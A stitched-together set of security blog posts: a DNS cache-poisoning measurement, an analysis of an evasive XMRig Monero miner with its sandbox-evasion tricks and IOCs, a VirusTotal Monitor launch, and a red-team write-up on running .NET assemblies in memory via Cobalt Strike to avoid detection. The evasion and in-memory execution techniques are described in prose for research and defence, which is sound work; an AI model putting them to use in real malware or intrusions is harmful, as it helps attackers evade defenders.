
Cache Poisoning of Mail Handling Domains Revisited

In 2014 we investigated cache poisoning and found some in some damaging places, like mail-handling domains. It can't be assumed behaviors on the internet continue unchanged, so I wanted to repeat the measurement. I used our same passive DNS data source and the same method, but now four years later, to investigate this question.

In summary, cache poisoning still appears to occur at about the same rate. As before, our method does not provide direct evidence of the mechanism; we only observe responses to queries from recursive resolvers. However, exactly what domains are targeted might give us some information about the underlying cause if it is correlated with domains or IPs in other reporting. In that regard, the focus seems to have shifted away from mail-handling domains.

Of the original 302 IP addresses that were found to be returning incorrect results, 112 are still doing so. In addition, I found 247 IP addresses that are also giving incorrect results, giving a total of 359 IP addresses. You can download that list here mxlist-ips.txt

In examining the results, I also found traces of a browser hijacker called fwdservice.com. Browser hijackers are an insidious malware that insinuate themselves into your browser to redirect search results, serve ads, spy on your actions, or other unwanted actions.

Fwdservice.com redirects search results to its own site and has been around since at least 2012. The site also been associated with phishing and malware, just to add to its poor behavior. The browser hijacker pretends to be a useful search engine but contains many more ads and poor results specified by the sponsor of the ads. It's also more than a simple single browser hijacker, it will affect every browser you have on your system.

It works by using a DNS redirect so that no matter where you think you're going, you're actually going to the fwdservice.com. This means that your queries are no longer going to the nameserver you specified, but one that the malware prefers. While I was looking for the A record poisoning, I found 317 IP addresses that were redirecting results of domains to the fwdservice.com IP address, in other words, IP addresses that were being used by the malware to redirect your search results. You can download that list here fwdservice-ips.txt.

Due to the nature of passive DNS, this is a subset of the possible IP addresses used by fwdservice.com. Unfortunately, this means there are more out there. But by blocking these IPs addresses, we can start to interfere with the browser hijacker. We should also continue to look for these DNS redirectors, they're insidious and easy to miss.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers to anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution of a complex mathematical puzzle, he is awarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One, in particular, is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue javascripts or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more details: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays the execution via the IcmpCreateFile and IcmpSendEcho APIs. As it is further detailed in Figure 6, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Ideally, as no answer is meant to be returned (interestingly enough we have knowledge of some devices erroneously replying to those ICMP packets), the IcmpSendEcho API has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noticing that a similar trick has been previously used by some infected CCleaner samples. In that case, the malicious shellcode was even going a step further by checking if the timeout parameter was being patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless it is quite worrying that anti-analysis techniques are becoming this mainstream. So much so that they started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, it is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Attached below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Launching VirusTotal Monitor, a service to mitigate false positives


One of VirusTotal’s core missions is to empower our antivirus partners. By building better tools to detect and study malware, VirusTotal gets to make a dent in the security of billions of users (all those that use the products of our partners). Until now we have focused on helping the antivirus industry flag malicious files, and now we also want to help it fix mistaken detections of legit files, i.e. false positives. At the same time, we want to fix an endemic problem for software developers.

False positives impact antivirus vendors, software developers and end-users. For example, let us imagine a popular streaming service app that allows in-app digital content purchases. We will call it Filmorrific.

Filmorrific happens to be so popular that when an antivirus vendor mistakenly flags it as malware, the AV vendor gets terrible press as major online news sites, computer magazines and blogs report on the issue. This leads to big reputation damage for the AV vendor.

The detection of Filmorrific leads to the software being quarantined and blocked from running on end-user machines. End-users are now unable to access their favourite streaming service, and they are also confused, thinking that Filmorrific has trojanized their machines.

For Filmorrific, the software publisher, this immediately translates to blacking out in the entire user base of the detecting AV vendor. Suddenly, they not only lose revenue coming from the installed base, but also trust from less technical users that do not really understand what is going on, and they get overloaded with support tickets accusing them of infecting user machines. Filmorrific in turn decides to sue the detecting antivirus company for the damage, and we have now come full circle.

Note that in this context, a software developer is not only a company creating an app or program distributed to thousands of machines and including some kind of monetisation strategy. Today, almost every organization builds internal tools that their finance, accounts payable, HR, etc. teams use. All of these tools are prone to false positives, and while this might not have a revenue impact, it certainly has a cost in terms of productivity hours lost because the workforce can’t access a given app.

What if we could kill these three birds with the same stone? Enter VirusTotal Monitor. VirusTotal already runs a multi-antivirus service that aggregates the verdicts of over 70 antivirus engines to give users a second opinion about the maliciousness of the files that they check. Why not take advantage of this setup not only to try to detect badness, but also to flag mistaken detections of legit software?

VirusTotal Monitor is a new service that allows software developers to upload their creations to a private cloud store in VirusTotal. Files in this private bucket are scanned with all 70+ antivirus vendors in VirusTotal on a daily basis, using the latest detection signature sets. Files also remain absolutely private, not shared with third-parties. It is only in the event of a detection that the file will be shared with the antivirus vendor producing the alert. As soon as the file is detected, both the software developer and the antivirus vendor are notified, the antivirus vendor then has access to the file and its metadata (company behind the file, software developer contact information, etc.) so that it can act on the detection and remediate it if it is indeed considered a false positive. The entire process is automatic.

For antivirus vendors this is a big win, as they can now have context about a file: who is the company behind it? when was it released? in which software suites is it found? What are the main file names with which it is distributed? For software developers it is an equally big win, as they can upload their creations to Monitor at pre-publish stage, to ensure a release without issues. They can also keep their files in the system, to automate notification of false positives to antivirus vendors in the future. Software developers no longer have to interact with 70 different vendors, each having its own interface and strenuous process to communicate issues.

In particular, software vendors use a Google-drive like interface where they can upload their software collections and provide details about the files:


Upon upload, the files are immediately scanned with the 70+ antivirus engines in VirusTotal, and then once a day thereafter. At any point in time you can refer to the Analyses view in order to see the health of your collection with respect to false positives:


All of this scanning activity is summarized in the dashboard where users land on subsequent accesses to the platform:


Developers are not forced to use this web interface, as the platform allows email notifications and offers a full REST API that is very useful when automating software release pipelines:

On their end, antivirus vendors also see something similar. They get access to a platform with all items that the particular engine detects and they can integrate with it programmatically via a different API endpoint. This is how certain vendors are able to quickly react and get over 200 false positives from our test bed fixed within minutes:


As previously stated, all files in this flow are private; they are not distributed to third-parties, only to antivirus vendors producing detections. This said, if one of the files in a Monitor collection happens to be uploaded to the standard public VirusTotal service, we will highlight that the file belongs to an organization in Monitor and will display the pertinent detections in orange rather than red:


VirusTotal Monitor is not a free pass to get any file whitelisted, sometimes vendors will indeed decide to keep detections for certain software, however, by having contextual information about the author behind a given file, they can prioritize work and take better decisions, hopefully leading to a world with less false positives.  The idea is to have a collection of known source software, then each antivirus can decide what kind of trust-based relationship they have with each software publisher.

As Marc Andreessen once said, “software is eating the world”, however, there is not much it can eat unless it can actually execute -- let’s make sure that legit software can run.

Bring Your Own Land (BYOL) – A Novel Red Teaming Technique

Introduction

One of most significant recent developments in sophisticated offensive operations is the use of “Living off the Land” (LotL) techniques by attackers. These techniques leverage legitimate tools present on the system, such as the PowerShell scripting language, in order to execute attacks. The popularity of PowerShell as an offensive tool culminated in the development of entire Red Team frameworks based around it, such as Empire and PowerSploit. In addition, the execution of PowerShell can be obfuscated through the use of tools such as “Invoke-Obfuscation”. In response, defenders have developed detections for the malicious use of legitimate applications. These detections include suspicious parent/child process relationships, suspicious process command line arguments, and even deobfuscation of malicious PowerShell scripts through the use of Script Block Logging.

In this blog post, I will discuss an alternative to current LotL techniques. With the most current build of Cobalt Strike (version 3.11), it is now possible to execute .NET assemblies entirely within memory by using the “execute-assembly” command. By developing custom C#-based assemblies, attackers no longer need to rely on the tools present on the target system; they can instead write and deliver their own tools, a technique I call Bring Your Own Land (BYOL). I will demonstrate this technique through the use of a custom .NET assembly that replicates some of the functionality of the PowerSploit project. I will also discuss how detections can be developed around BYOL techniques.

Background

At DerbyCon last year, I had the pleasure of meeting Raphael Mudge, the developer behind the Cobalt Strike Remote Access Tool (RAT). During our discussion, I mentioned how useful it would be to be able to load .NET assemblies into Cobalt Strike beacons, similar to how PowerShell scripts can be imported using the “powershell-import” command. During a previous Red Team engagement I had been involved in, the use of PowerShell was precluded by the Endpoint Detection and Response (EDR) agent present on host machines within the target environment. This was a significant issue, as much of my red teaming methodology at the time was based on the use of various PowerShell scripts. For example, the “Get-NetUser” cmdlet of the PowerView script allows for the enumeration of domain users within an Active Directory environment. While the use of PowerShell was not an option, I found that no application-based whitelisting was occurring on hosts within the target’s environment. Therefore, I started converting the PowerShell functionality into C# code, compiling assemblies locally as Portable Executable (PE) files, and then uploading the PE files onto target machines and executing them. This tactic was successful, and I was able to use these custom assemblies to elevate privileges up to Domain Admin within the target environment.

Raphael agreed that the ability to load these assemblies in-memory using a Cobalt Strike beacon would be useful, and about 8 months later this functionality was incorporated into Cobalt Strike version 3.11 via the “execute-assembly” command.

“execute-assembly” Demonstration

For this demonstration, a custom C# .NET assembly named “get-users” was used. This assembly replicated some of the functionality of the PowerView “Get-NetUser” cmdlet; it queried the Domain Controller of the specified domain for a list of all current domain accounts. Information obtained included the “SAMAccountName”, “UserGivenName”, and “UserSurname” properties for each account. The domain is specified by passing its FQDN as an argument, and the results are then sent to stdout. The assembly being executed within a Cobalt Strike beacon is shown in Figure 1.


Figure 1: Using the “execute-assembly” command within a Cobalt Strike beacon.

Simple enough, now let’s take a look at how this technique works under the hood.

How “execute-assembly” Works

In order to discover more about how the “execute-assembly” command works, the execution performed in Figure 1 was repeated with the host running ProcMon. The results of the process tree from ProcMon after execution are shown in Figure 2.


Figure 2: Process tree from ProcMon after executing “execute-assembly” command.

In Figure 2, The “powershell.exe (2792)” process contains the beacon, while the “rundll32.exe (2708)” process is used to load and execute the “get-users” assembly. Note that “powershell.exe” is shown as the parent process of “rundll32.exe” in this example because the Cobalt Strike beacon was launched by using a PowerShell one-liner; however, nearly any process can be used to host a beacon by leveraging various process migration techniques. From this information, we can determine that the “execute-assembly” command is similar to other Cobalt Strike post-exploitation jobs. In Cobalt Strike, some functions are offloaded to new processes, in order to ensure the stability of the beacon. The rundll32.exe Windows binary is used by default, although this setting can be changed. In order to migrate the necessary code into the new process, the CreateRemoteThread function is used. We can confirm that this function is utilized by monitoring the host with Sysmon while the “execute-assembly” command is performed. The event generated by the use of the CreateRemoteThread function is shown in Figure 3.


Figure 3: CreateRemoteThread Sysmon event, created after performing the “execute-assembly” command.

More information about this event is shown in Figure 4.


Figure 4: Detailed information about the Sysmon CreateRemoteThread event shown in Figure 3.

In order to execute the provided assembly, the Common Language Runtime (CLR) must be loaded into the newly created process. From the ProcMon logs, we can determine the exact DLLs that are loaded during this step. A portion of these DLLs are shown in Figure 5.


Figure 5: Example of DLLs loaded into rundll32 for hosting the CLR.

In addition, DLLs loaded into the rundll32 process include those necessary for the get-users assembly, such as those for LDAP communication and Kerberos authentication. A portion of these DLLs are shown in Figure 6.


Figure 6: Example of DLLs loaded into rundll32 for Kerberos authentication.

The ProcMon logs confirm that the provided assembly is never written to disk, making the “execute-assembly” command an entirely in-memory attack.

Detecting and Preventing “execute-assembly”

There are several ways to protect against the “execute-assembly” command. As previously detailed, because the technique is a post-exploitation job in Cobalt Strike, it uses the CreateRemoteThread function, which is commonly detected by EDR solutions. However, it is possible that other implementations of BYOL techniques would not require the use of the CreateRemoteThread function.

The “execute-assembly” technique makes use of the native LoadImage function in order to load the provided assembly. The CLRGuard project hooks into the use of this function, and prevents its execution. An example of CLRGuard preventing the execution of the “execute-assembly” command is shown in Figure 7.


Figure 7: CLRGuard blocking the execution of the “execute-assembly” technique.

The resulting error is shown on the Cobalt Strike teamserver in Figure 8.


Figure 8: Error shown in Cobalt Strike when “execute-assembly” is blocked by CLRGuard.

While CLRGuard is effective at preventing the “execute-assembly” command, as well as other BYOL techniques, it is likely that blocking all use of the LoadImage function on a system would negatively impact other benign applications, and is not recommended for production environments.

As with almost all security issues, baselining and correlation is the most effective means of detecting this technique. Suspicious events to correlate could include the use of the LoadImage function by processes that do not typically utilize it, and unusual DLLs being loaded into processes.

Advantages of BYOL

Due to the prevalent use of PowerShell scripts by sophisticated attackers, detection of malicious PowerShell activity has become a primary focus of current detection methodology. In particular, version 5 of PowerShell allows for the use of Script Block Logging, which is capable of recording exactly what PowerShell scripts are executed by the system, regardless of obfuscation techniques. In addition, Constrained Language mode can be used to restrict PowerShell functionality. While bypasses exist for these protections, such as PowerShell downgrade attacks, each bypass an attacker attempts is another event that a defender can trigger off of. BYOL allows for the execution of attacks normally performed by PowerShell scripts, while avoiding all potential PowerShell-based alerts entirely.

PowerShell is not the only native binary whose malicious use is being tracked by defenders. Other common binaries that can generate alerts on include WMIC, schtasks/at, and reg. The functionality of all these tools can be replicated within custom .NET assemblies, due to the flexibility of C# code. By being able to perform the same functionality as these tools without using them, alerts that are based on their malicious use are rendered ineffective.

Finally, thanks to the use of reflective loading, the BYOL technique can be performed entirely in-memory, without the need to write to disk.

Conclusion

BYOL presents a powerful new technique for red teamers to remain undetected during their engagements, and can easily be used with Cobalt Strike’s “execute-assembly” command. In addition, the use of C# assemblies can offer attackers more flexibility than similar PowerShell scripts can afford. Detections for CLR-based techniques, such as hooking of functions used to reflectively load assemblies, should be incorporated into defensive methodology, as these attacks are likely to become more prevalent as detections for LotL techniques mature.

Acknowledgement

Special thanks to Casey Erikson, who I have worked closely with on developing C# assemblies that leverage this technique, for his contributions to this blog.

Fake Malware Pop-up Example

I don't believe I've ever done a video blog, but I wanted to show you what it looks like when we look at a fake malware pop-up.  While I was prepping a lecture for a class I'm teaching by looking at something on Encyclopedia Britannica, I experienced a fake malware popup.

Here's what I saw:

"Serifed.Stream" malicious pop-up
The best way to explain this is to show it to you.  To do so, I've saved a little video of the what we saw.